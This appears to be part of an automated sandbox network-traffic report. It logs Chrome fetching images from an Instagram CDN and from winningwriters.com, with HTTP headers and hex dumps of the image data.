                                                                                                                                                                                            Data Ascii: ?j4j}x5-5~b~KQq]Os|#P |)h.kkeo"n1N~>6kMX9h^cs\xSV#>b?2+S4u_ZE[#nK1PoZ0cOG5+gRIJH@v/#,FZ
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: 0d bf 67 69 c2 82 bf dd 24 00 71 ec 08 ae aa 8a 2c 0e 29 ea 73 da 27 83 f4 ed 0f 56 b8 d4 34 f9 ae 62 fb 40 da f0 65 3c a0 3b 00 36 e4 63 eb 46 bd e1 1b 4d 73 54 b5 d4 2e 2f af e2 9a d0 83 02 c2 c8 15 08 39 cf 2a 79 c8 1d fb 57 43 45 16 0e 55 6b 08 06 00 19 27 dc d5 0d 6b 43 d3 75 db 75 b7 d4 ed c4 b1 2b 65 48 3b 5d 0f aa 91 d0 d6 85 14 0d ab ab 32 28 bc 0c 64 b5 5b 4b 9f 13 eb b7 7a 69 18 fb 34 93 a8 de bf dd 67 0a 1c 8c 76 cd 4f e1 3f 02 69 9e 14 d4 6f ef 34 bb 9b b5 5b d3 99 2d 9d 90 c4 bc 92 bb 40 50 46 32 40 e7 a1 ad ad 1a e3 cc 83 ca 27 e6 8f a7 d2 b4 ab 36 ac 70 4a 3c ae c1 59 fa de 95 65 ae e9 77 1a 6d fc 22 5b 59 d7 0e a4 e3 dc 10 7b 10 70 6b 42 8a 44 9c 2e 9d f0 e8 69 d0 0b 3b 7f 14 f8 85 34 f1 c2 db 2d ca 80 a3 fb a1 82 e4 0f a6 2a ce 91 f0 f3
                                                                                                                                                                                            Data Ascii: gi$q,)s'V4b@e<;6cFMsT./9*yWCEUk'kCuu+eH;]2(d[Kzi4gvO?io4[-@PF2@'6pJ<Yewm"[Y{pkBD.i;4-*
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: eb 17 8d be 67 52 44 51 67 f8 23 5e c0 74 cf 53 de b8 df 8f 62 68 34 dd 1e 78 ae ae 63 f3 2f 04 32 46 93 30 8d d4 82 79 5c e0 9e 3a e3 bd 77 5e 0c f1 35 97 8a f4 38 75 3b 26 c1 6f 96 68 89 cb 44 e3 aa 9f e8 7b 8c 57 0f fb 41 ff 00 c8 13 44 ff 00 b0 8a ff 00 e8 2d 40 1e 97 a9 40 2e 74 fb 98 0c 92 c5 be 36 1b e2 72 8e bc 75 04 72 0d 78 bf c1 ff 00 0f cf e2 dd 12 f2 e3 5b d4 af 6e 34 c4 bb 60 2d 04 ec a2 69 76 2e e6 91 81 dc c3 1b 40 19 f5 af 70 9f fd 44 9f ee 9f e5 5e 61 fb 3a 7f c8 8d 77 ff 00 61 19 3f f4 5c 74 01 5b c7 3a 00 f8 7d 69 17 89 fc 27 24 d6 49 6d 2a 0b bb 2f 35 9a 09 91 8e 39 52 4e 0e 48 1f 8e 46 08 af 46 7d 72 d9 3c 34 75 e6 0d f6 51 67 f6 cc 77 d9 b3 7e 3e b8 ae 6f e3 67 fc 93 1d 67 fe d8 7f e8 e8 e9 d0 cd 65 07 c1 cb 57 d4 03 35 a1 d0 e2 59
                                                                                                                                                                                            Data Ascii: gRDQg#^tSbh4xc/2F0y\:w^58u;&ohD{WAD-@@.t6rurx[n4`-iv.@pD^a:wa?\t[:}i'$Im*/59RNHFF}r<4uQgw~>oggeW5Y
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: a1 34 36 f7 57 01 25 89 30 01 c3 2f 70 33 c8 27 23 38 ab 1e 09 d2 af 24 d6 f5 6f 12 df 5b bd a3 5f 90 90 5b b8 c3 ac 63 1c b0 ec 4e 17 8f ad 50 f8 a9 ff 00 21 4f 0a ff 00 d7 ef fe cc 94 74 13 bf 26 a7 65 e2 16 b9 8f 43 be 96 ce e0 db dc 47 0b 48 92 6c 0d 82 06 7a 1e 3b 57 09 e1 08 fc 4f e2 bd 09 27 9f 5e 96 ca d8 3b 81 24 20 19 a6 6c f7 3c 6d 51 d0 01 5d ee bf ff 00 20 2d 47 fe bd a5 ff 00 d0 4d 73 5f 08 7f e4 49 b7 ff 00 ae d2 7f e8 54 3d ca 92 bc 92 34 2f ac ef 2c 3c 09 a9 db 5f 5e bd ed ca 59 5c 6e 9d 86 0b 7c ad 8f d3 15 43 e1 8c 46 7f 87 96 90 ac af 11 90 4c a2 48 c8 0c 99 76 19 19 ee 2b 7b c5 7f f2 2b eb 1f f5 e5 37 fe 80 6b 17 e1 3f fc 88 7a 7f fb d2 ff 00 e8 c6 a3 a8 5b df 4b c8 e5 bc 23 a4 4b 71 e3 5f 12 5b 2e af a8 c2 d0 b8 06 68 9d 03 cb f3 1f
                                                                                                                                                                                            Data Ascii: 46W%0/p3'#8$o[_[cNP!Ot&eCGHlz;WO'^;$ l<mQ] -GMs_IT=4/,<_^Y\n|CFLHv+{+7k?z[K#Kq_[.h
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: 7f da b3 af d9 3e c6 ca 5b ed 29 bb 3d 07 4c 13 c9 e3 eb eb 13 78 d7 c4 ba 7b 67 53 f0 74 ed 8f bd 2d b9 24 0f c8 30 fd 6a df 8c f4 9d 56 1f 13 e9 9e 27 d3 2d be dd f6 24 31 49 6c 0e 18 af cd ca fa 9c 39 fc 87 5a bf 0f 8d ec dd 40 6d 2b 5b 8e 7e f0 9b 17 2c 0f e1 c5 23 2e af 5b 12 78 57 c6 ba 5f 89 64 68 2d c4 b0 5d a0 dc d0 4c b8 6c 77 20 8e 0f f3 aa 7e 3a f0 e6 ad af 5f e9 33 58 35 8a 47 61 27 9d fb f9 1c 17 6c a9 c6 02 9e 3e 5f d6 a5 d2 f4 f9 f5 4f 14 af 88 67 d3 8e 9d 1c 30 34 31 24 98 13 4c 4f f1 38 1d 00 1c 01 d6 ba ca 7b 94 93 92 b4 8a 1a cc 17 77 7a 2d dd bd b2 c0 2e a7 85 a3 51 23 90 8a 58 60 9c 80 4f 19 f4 e7 da b2 7c 03 a2 5f f8 7b 44 fe ce bf 6b 57 29 23 32 3c 0e cd 90 79 e7 2a 31 cd 74 b4 50 55 b5 b9 9b e2 2b 5b bb fd 0e fa ca cf c9 f3 ee 61
                                                                                                                                                                                            Data Ascii: >[)=Lx{gSt-$0jV'-$1Il9Z@m+[~,#.[xW_dh-]Llw ~:_3X5Ga'l>_Og041$LO8{wz-.Q#X`O|_{DkW)#2<y*1tPU+[a


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            18192.168.2.1649731157.240.249.634436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:06 UTC859OUTGET /v/t51.2885-15/467112998_3886836521643779_8605725034765016710_n.jpg?_nc_cat=101&ccb=1-7&_nc_sid=18de74&_nc_ohc=_cdycnS1RYQQ7kNvgEJjUe2&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYDPIeUcR1p4zvzbgpOdfbp9YsIY1oSApIPk7ope3-S9-Q&oe=674157AC HTTP/1.1
                                                                                                                                                                                            Host: scontent-ord5-1.cdninstagram.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:06 UTC583INHTTP/1.1 200 OK
                                                                                                                                                                                            x-additional-error-detail:
                                                                                                                                                                                            Last-Modified: Fri, 15 Nov 2024 20:02:08 GMT
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            X-Needle-Checksum: 2054134243
                                                                                                                                                                                            content-digest: adler32=2054134243
                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Cache-Control: max-age=1209600, no-transform
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:06 GMT
                                                                                                                                                                                            X-FB-Connection-Quality: EXCELLENT; q=0.9, rtt=21, rtx=0, c=13, mss=1380, tbw=3356, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 159333
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1INData Raw: ff
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1500INData Raw: d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 04 38 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23
                                                                                                                                                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!2222222222222222222222222222222222222222222222222288"}!1AQa"q2#
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: 40 a7 d0 ed 8c e2 80 3d da 8a f1 33 f1 cf 5b b0 c4 ba cf c3 fd 4a d2 d3 f8 a6 dc eb b4 7f c0 a3 00 fe 62 bd 3f c2 fe 29 d2 7c 5d a4 ae a3 a4 5c f9 b1 67 6b a3 0c 3c 6d fd d6 1d 8f e9 e9 40 1b b4 51 5e 4f e3 0f 8b 9a 97 87 3c 6b 37 86 f4 ef 0c b6 ab 32 46 8e be 54 ad bd b2 bb 8f ca a8 7a 50 07 ac 51 5e 26 7e 33 f8 b6 2f 9e 6f 86 ba 90 8c 72 c7 f7 ab 81 f5 31 57 63 e0 7f 8a 3a 2f 8d a4 7b 48 56 5b 2d 4e 30 4b d9 4f 8d c4 0e a5 4f f1 63 bf 43 ed 40 1d dd 14 51 40 05 15 cd f8 eb c4 89 e1 3f 06 6a 5a b9 23 cd 86 22 b0 03 fc 52 b7 ca 83 f3 20 9f 60 69 9e 03 f1 22 f8 b3 c1 7a 66 af 90 66 92 2d 97 00 76 95 7e 57 fa 72 33 f4 22 80 3a 7a 28 aa f7 73 49 05 94 f3 45 11 96 48 e3 67 48 c7 57 20 64 0f c6 80 2c 51 5e 2c 7e 2c f8 f9 54 b3 7c 32 d4 40 03 24 98 e6 e3 ff 00
                                                                                                                                                                                            Data Ascii: @=3[Jb?)|]\gk<m@Q^O<k72FTzPQ^&~3/or1Wc:/{HV[-N0KOOcC@Q@?jZ#"R `i"zff-v~Wr3":z(sIEHgHW d,Q^,~,T|2@$
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: c4 32 f8 93 e1 e6 99 77 70 fb ee 61 53 6d 33 13 92 cc 87 00 9f 72 bb 49 f7 35 b7 e3 08 d2 6f 04 eb d1 c9 f7 1b 4e b8 0d f4 f2 da bc e3 f6 73 66 3e 02 d4 03 67 6a ea 6f b7 fe fd 47 9a 00 f6 2a f0 ff 00 87 7e 19 bb f1 0f c4 bf 10 78 b3 c4 ba 6d d2 c9 04 ff 00 e8 49 77 03 2a f2 58 2b 2e e1 ce c5 55 03 eb 9e b8 af 70 a2 80 0a f9 f3 c6 d6 10 f8 13 e3 6f 87 75 7d 1d 04 11 ea 52 2f da 20 8f 85 25 9f 64 98 1e 8c 18 1c 7a f3 5e e7 aa 6a 96 7a 2e 99 3e a1 a8 5c 24 16 b0 29 79 24 73 c0 1f d4 f6 03 bd 78 56 88 d7 bf 17 be 2c 5b f8 84 db 3c 3e 1e d1 9d 7c ad eb f7 b6 1d ca be 85 99 b0 48 ec 38 f4 c8 07 d0 b4 51 48 48 03 24 e0 0a 00 c1 f1 7f 89 ac fc 21 e1 ab ad 66 f0 e5 61 5c 47 1e 70 65 90 fd d4 1f 53 f9 0c 9e d5 e1 91 f8 62 f2 f7 e1 a7 8a bc 7f e2 11 e6 6a da ac 3b
                                                                                                                                                                                            Data Ascii: 2wpaSm3rI5oNsf>gjoG*~xmIw*X+.Upou}R/ %dz^jz.>\$)y$sxV,[<>|H8QHH$!fa\GpeSbj;
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: f4 7b 73 79 6e 0b 9f ef bf ef 3a fa 0e df 99 20 15 24 7d 77 e3 bf 89 bc a8 7c eb 0f 09 58 c9 cb 1e ae 7d 7d 1a 42 3b 74 50 7f 3f 77 d1 b4 6d 3f 40 d2 6d f4 dd 36 d9 20 b5 81 76 a2 28 fc c9 3d c9 ea 4f 7a f1 3d 1e df e3 56 85 a5 43 a6 69 9e 1e d3 ed ed 21 5d a9 1a b5 b7 e6 4f 99 c9 3d 49 3d 6b 46 1d 43 e3 b9 9a 31 2e 8f 64 23 dc 37 90 f6 dd 33 cf fc b4 a0 0f 6d af 33 f8 c3 ac 6b f6 fe 1d fe c7 f0 ee 93 a9 5e 5d 6a 0a 56 69 ed 2d 64 90 43 17 42 37 28 20 33 74 fa 67 da bd 32 8a 00 f9 b3 c1 de 29 f1 d7 82 fc 3f 1e 95 a7 7c 39 bd 65 0c 64 92 67 b1 b8 df 2b 9f e2 6c 0f 4c 0f a0 14 ff 00 18 fc 44 f1 de b1 e1 2d 42 c3 55 f0 3d c5 8d 8c d1 85 9a e5 ad 27 41 18 dc 0e 72 c3 03 90 3a d7 d2 15 cb 7c 43 d2 af b5 df 00 eb 1a 66 9d 07 9f 79 71 08 58 a3 dc ab b8 ee 07 ab
                                                                                                                                                                                            Data Ascii: {syn: $}w|X}}B;tP?wm?@m6 v(=Oz=VCi!]O=I=kFC1.d#73m3k^]jVi-dCB7( 3tg2)?|9edg+lLD-BU='Ar:|CfyqX
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4044INData Raw: ed 3f f4 13 5e df 40 18 3a 57 89 6c 75 6d 77 58 d1 91 b6 5e e9 92 aa 4b 19 3c b2 b2 86 57 1e dc e3 d8 8f 71 5b d5 f2 cf 8c 7c 47 a8 78 4f e3 c6 b1 ac e9 ca cc d6 f2 c6 66 8f 9d af 11 8e 30 ca de c7 23 9e c7 15 f4 96 85 ad d9 78 8f 44 b4 d5 f4 f9 44 96 d7 28 1d 4f 75 3d d4 fa 10 72 0f d2 80 2b f8 9b c5 7a 47 83 f4 e8 ef f5 ab 96 82 da 49 84 0a cb 1b 3e 5c 86 60 30 a0 9e 8a 6b 5a de 78 ee ad a2 b8 88 e6 39 50 3a 1c 63 20 8c 8a f2 5f da 37 fe 49 ee 9f ff 00 61 58 ff 00 f4 54 b5 ea 1a 0f fc 8b da 67 fd 7a 45 ff 00 a0 0a 00 d0 a2 8a 28 00 aa b7 f7 f6 9a 65 94 97 77 d7 31 5b 5b 44 32 f2 ca e1 55 47 b9 35 6a bc 07 e2 9c d3 f8 af e2 e6 85 e0 b9 ee 5e 0d 30 18 cc 8a a7 1b 99 f2 4b 7d 76 80 07 a1 27 d6 80 35 bc 71 f1 cf 46 8b 44 b9 83 c2 ba 84 92 6a a1 94 45 31 b6
                                                                                                                                                                                            Data Ascii: ?^@:WlumwX^K<Wq[|GxOf0#xDD(Ou=r+zGI>\`0kZx9P:c _7IaXTgzE(ew1[[D2UG5j^0K}v'5qFDjE1
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: 40 1e dd f0 b7 fe 44 f5 ff 00 ae ef fd 2b b5 35 c5 7c 2d ff 00 91 3d 7f eb bb ff 00 4a ed 4d 7d 36 1b f8 51 f4 3e 0b 1f fe f3 3f 56 2d 14 51 5b 9c 81 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 07 9c 7c 74 ff 00 92 4f a9 ff 00 d7 58 3f f4 6a d6 ef c3 6f f9 26 be 1c ff 00 af 08 bf f4 1a ea a8 a0 02 8a 28 a0 0c 8f 15 7f c8 a3 ad 7f d7 84 ff 00 fa 2d ab cf bf 67 9f f9 26 d2 ff 00 d8 42 5f fd 05 2b d6 28 a0 0f 3c f8 ad f0 f9 7c 6b a0 fd a2 cd 42 6b 56 20 bd ac 83 83 20 ea 63 27 df b7 a1 fa 9a a5 f0 8b e2 1b 78 a3 4e 7d 1b 57 90 ae bd a7 8d b2 09 38 69 d0 71 bb 1f de 1d 18 7a f3 df 8f 50 a2 80 0a f0 ff 00 04 ff 00 c9 ca f8 bb fe bd 25 ff 00 d0 e1 af 70 a2 80 0a f9 c3 e3 9f 8f 53 53 d5 d3 c2 76 53 b0 b1 b4 90 35 f3 a7 25 e4
                                                                                                                                                                                            Data Ascii: @D+5|-=JM}6Q>?V-Q[EPEPEPEPEPEPEP|tOX?jo&(-g&B_+(<|kBkV c'xN}W8iqzP%pSSvS5%
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: b3 75 6f 88 3e 32 02 df fb 25 6c 9c bb 15 7d f1 74 e3 20 f5 f4 06 8e 64 1f 55 a8 7b 5d 25 78 65 df 8e be 23 5b a4 66 26 d2 ae 0b 7d e0 90 91 b7 f3 3c d5 0d 4f e2 87 c4 0d 2e 14 96 61 a6 b2 b1 c7 cb 6e 78 fc cd 35 24 c5 2c 3d 48 ee 8f a0 e8 af 99 0f c7 5f 18 82 46 74 fe 3f e9 87 ff 00 5e a1 9f e3 cf 8c a3 8f 70 fe cf ce 71 ff 00 1e e7 fc 68 b9 93 83 47 d4 1d e9 08 00 57 ce 90 7c 6b f1 34 96 89 2b fd 88 31 50 7f d5 1e 7d 7b d5 ab 0f 8c 3e 24 bc b8 31 91 6a b8 52 78 8f 9f e7 56 a3 73 b2 96 5d 56 ac a3 18 b5 77 b1 f4 00 60 69 7e 95 e4 ba 2f 8f b5 bb ed 56 da 09 9a 03 1c 8c 03 00 98 3f ce bb f9 75 69 20 81 e6 96 48 e3 8d 06 e6 76 1c 01 4b 1b 17 83 69 55 ea af a0 62 f2 ea d8 59 28 d4 b5 cd da 2b c1 7c 59 f1 ab 55 b5 96 29 34 38 62 16 4e 59 04 f3 c0 c7 73 03 8f
                                                                                                                                                                                            Data Ascii: uo>2%l}t dU{]%xe#[f&}<O.anx5$,=H_Ft?^pqhGW|k4+1P}{>$1jRxVs]Vw`i~/V?ui HvKiUbY(+|YU)48bNYs
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: 2d a4 70 c7 07 9e 5d 51 db 2d 80 a0 8c 1f c7 8a f3 1f 16 ea 49 ac 7c 5b b0 b9 48 ca 65 21 56 56 39 c1 00 f7 ef 5d 79 b7 6d b0 cc e3 e4 2c d1 ff 00 23 fd 6b 90 f1 2c 90 cf f1 72 c5 a1 8b cb 8d 62 85 76 8e 39 09 83 5e 87 3b f6 92 8b 67 97 8c a1 46 18 58 4e 9c 75 7b b3 a2 37 30 ae a6 2d 44 4a bc 13 bf 8e 4e 38 03 f5 a8 b5 5f 34 e1 d5 8a 84 68 d8 0c 70 30 c7 fc 05 52 bb 8d ed f5 e1 21 65 08 d3 46 40 db cf dd c7 35 a3 ad a6 2c 9b 39 db b8 67 3f 5a ad 2e 8f 30 d6 d3 f5 05 bb 8f e7 20 38 1f 37 1f ca ac 92 10 84 04 e4 9e e4 73 5c 15 ac 86 2b a7 68 f0 ae 84 60 8f 71 5d 2d be a3 15 e3 46 25 44 32 16 da ca c0 7a 1e 7f 4a 53 85 b5 45 5c d7 72 14 00 08 f6 35 5a f6 f6 3b 3b 57 99 d7 7f 96 3e ea 91 93 e8 2a bc 89 10 46 1e 54 61 40 e8 10 74 ae 7b c5 37 32 1d 06 de 22 55
                                                                                                                                                                                            Data Ascii: -p]Q-I|[He!VV9]ym,#k,rbv9^;gFXNu{70-DJN8_4hp0R!eF@5,9g?Z.0 87s\+h`q]-F%D2zJSE\r5Z;;W>*FTa@t{72"U
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: 5d dd 0a 32 b2 d4 93 44 8e 2b fb f6 69 b6 86 48 b0 14 f0 4f 4c ff 00 4a 9a 64 86 30 52 34 03 6b b8 38 ef f3 1a c7 d3 37 47 75 bc 31 0c ab d8 fb 8a d4 03 cd 90 e0 12 cc c4 91 eb 9e 6a 09 4c 7a 5b c8 6d da 50 09 db d8 57 9b 7c 4e 1c 58 1d c7 19 61 8f 4e 95 eb b3 42 b6 fa 61 56 90 a1 23 27 6f 5c d7 91 7c 50 04 c5 a7 3f 62 5c 0f d2 ae 9b f7 89 a8 ac 8e 80 f8 7d 6f fc 3d a5 db f9 c7 cb 91 21 2c a7 d8 02 7f 0c 66 ba e4 55 44 54 40 02 a8 c0 03 b0 ac fd 05 d9 6c ac dd 38 d9 6b 1a 0c 8c f2 54 13 fd 2b 60 5d 33 0c 4b 1c 72 0f 75 00 fe 62 a6 ac ae ec 7d 16 5f 49 d3 a7 cd 6d cb d6 38 8b 41 d4 a5 c0 cb 98 e3 1f 89 c9 ac aa d8 bb 54 b7 f0 e5 b2 c4 49 5b 99 9a 5e 47 38 03 18 ac 7a 89 74 47 4e 19 f3 73 4f bb fc b4 0a 28 a2 a4 ea 0a 28 a2 80 0a 46 55 75 da c0 11 ef 4b 45
                                                                                                                                                                                            Data Ascii: ]2D+iHOLJd0R4k87Gu1jLz[mPW|NXaNBaV#'o\|P?b\}o=!,fUDT@l8kT+`]3Krub}_Im8ATI[^G8ztGNsO((FUuKE


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            19192.168.2.164972266.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:06 UTC910OUTGET /assets/images/social-sprite-2020_new.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/assets/css/style.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:06 UTC369INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:06 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Thu, 09 Mar 2023 14:20:15 GMT
                                                                                                                                                                                            ETag: "11a3-5f67857f2f734"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 4515
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:06 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4515INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b7 00 00 00 16 08 06 00 00 00 82 2e 0d d4 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 11 38 49 44 41 54 68 43 ed 5b 79 94 55 45 7e ae ba fd 7a 45 1a 41 69 54 14 45 86 69 08 89 82 61 3a 40 3f fa 75 23 3b 8e 1b 82 a8 38 c6 09 18 1d 32 46 69 06 c5 64 d4 78 8e 4e 32 3a 33 82 71 f9 63 ce 19 01 11 18 18 19 87 19 60 06 a5 f7 66 77 85 40 a2 c8 de dd ec 84 ad 5f bf ad f2 7d 75 eb 3d de fe ee 6b c8 c9 39 49 3e f8 f5 ad aa 7b 6f dd 5a be fa d5 ef 57 55 4f 8a 14 18 36 6c 58 61 5e 5e de 30 29 d5 50 25 54 b9 90 e2 2f 85 12 85 78 61 a7 92 a2 49 48 6b 9b df e5 6f dc b8 7e e3 51 f3 ca 65 c5 f0 31 c3 4b 72
                                                                                                                                                                                            Data Ascii: PNGIHDR.sRGBgAMAapHYs(J8IDAThC[yUE~zEAiTEia:@?u#;82FidxN2:3qc`fw@_}u=k9I>{oZWUO6lXa^^0)P%T/xaIHko~Qe1Kr


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            20192.168.2.164974166.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:06 UTC669OUTGET /graphics/newsletter/best_free_contests_top_banner_2024.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:06 UTC371INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:06 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Sun, 27 Oct 2024 21:20:02 GMT
                                                                                                                                                                                            ETag: "185df-6257bea55596f"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 99807
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:06 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
